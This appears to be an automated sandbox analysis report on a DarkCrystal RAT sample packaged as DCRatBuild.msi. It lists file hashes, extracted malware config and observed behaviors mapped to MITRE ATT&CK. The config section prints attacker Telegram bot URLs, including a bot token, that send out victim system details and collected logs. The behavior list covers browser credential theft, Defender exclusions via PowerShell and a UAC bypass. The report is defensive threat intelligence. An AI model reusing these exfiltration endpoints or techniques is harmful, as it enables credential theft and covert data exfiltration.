General
Target: DCRatBuild.msi
Size: 4.9MB
Sample: 240911-1k4vravdph
MD5: 10a32fe9b9bde1619fe90f44f33e83d7
SHA1: 18925c3452f9a25e131bc0bde7b9476e58a651d6
SHA256: 70f2953bdc5ac694ceb612a18354d624b5482b38a3cfed67e61fc90b6c7f4bb8
SHA512: efda18a6a874d2b2b1cec129ad84199485b7910c210eabf0c1c0f015114e7f1baf2aeb0a41cbe2eafb3e8af4db2b9d4cb7afad6f908d7db74ef6a3c6133aee58
SSDEEP: 98304:ubo+lbwHPjVTRjInqy49tnouxcWJGTlhIfWNK7XdBoQ0emBUGW:uHlbwrxRjIq1JxcW4TDIfWNcdBfmWGW
Behavioral task: behavioral1
Sample: DCRatBuild.exe
Resource: win7-20240903-en

Malware Config
Extracted: gurcu
https://api.telegram.org/bot7270981715:AAF4Nhu71Hf548vFJ0h0Xyvg4NGgEExI-NU/sendPhoto?chat_id=7450750733&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%205a7a8bf7fe711539e9b86ea23a057b5824572be3%0A%E2%80%A2%20Comment%3A%20%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20KVIWLPUJ%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CUsers%5CAll%20Users%5CTextInputHost.ex
https://api.telegram.org/bot7270981715:AAF4Nhu71Hf548vFJ0h0Xyvg4NGgEExI-NU/sendDocument?chat_id=7450750733&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%205a7a8bf7fe711539e9b86ea23a057b5824572be3%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A01.979380
Targets
DcRat: DarkCrystal (DC) is a .NET RAT, active since June 2019, that is capable of loading additional plugins.

Process spawned unexpected child process: This typically indicates the parent process was compromised via an exploit or macro.

Credentials from Password Stores: Credentials from Web Browsers: Malicious access to, or copy of, a web browser credential store.

Command and Scripting Interpreter: PowerShell: Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

Checks computer location settings: Looks up the country code configured in the registry, likely for geofencing.

Executes dropped EXE

Checks installed software on the system: Looks up Uninstall key entries in the registry to enumerate software on the system.

Looks up external IP address via web service: Uses a legitimate IP lookup service to find the infected system's external IP.
MITRE ATT&CK Enterprise v15 (count of matching signatures in parentheses)

Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Privilege Escalation
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Defense Evasion
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Impair Defenses (1)
    Disable or Modify Tools (1)
  Modify Registry (2)
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (1)
    Credentials In Files (1)